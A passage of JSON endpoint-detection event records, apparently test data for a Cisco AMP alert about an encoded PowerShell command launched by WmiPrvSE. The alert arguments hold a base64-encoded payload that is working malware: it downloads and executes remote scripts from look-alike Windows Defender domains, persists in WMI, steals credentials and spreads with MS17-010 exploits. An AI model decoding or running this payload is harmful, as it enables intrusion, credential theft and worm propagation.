CAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20190517123456,"sig_rev":5},"detection":"apde:20190517123456","end_ts":1610640884,"engine":"apde","id":"d2616Ab846","name":"WMIPRVSE Launched Encoded Powershell Command","observables":{"file":[{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1},{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1}]},"remediated":false,"severity":"medium","silent":false,"start_ts":1610640884,"tactics":["TA0002","TA0005","TA0008"],"type":"activity","normalized":{"observables":{"file":{"name":["powershell.exe","wmiprvse.exe"],"path":["c:\\windows\\system32\\windowspowershell\\v1.0","c:\\windows\\system32\\wbem"]}},"name":"wmiprvse launched encoded powershell command"},"ts":1610640884},"tactics":["TA0002","TA0005","TA0008"]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbAB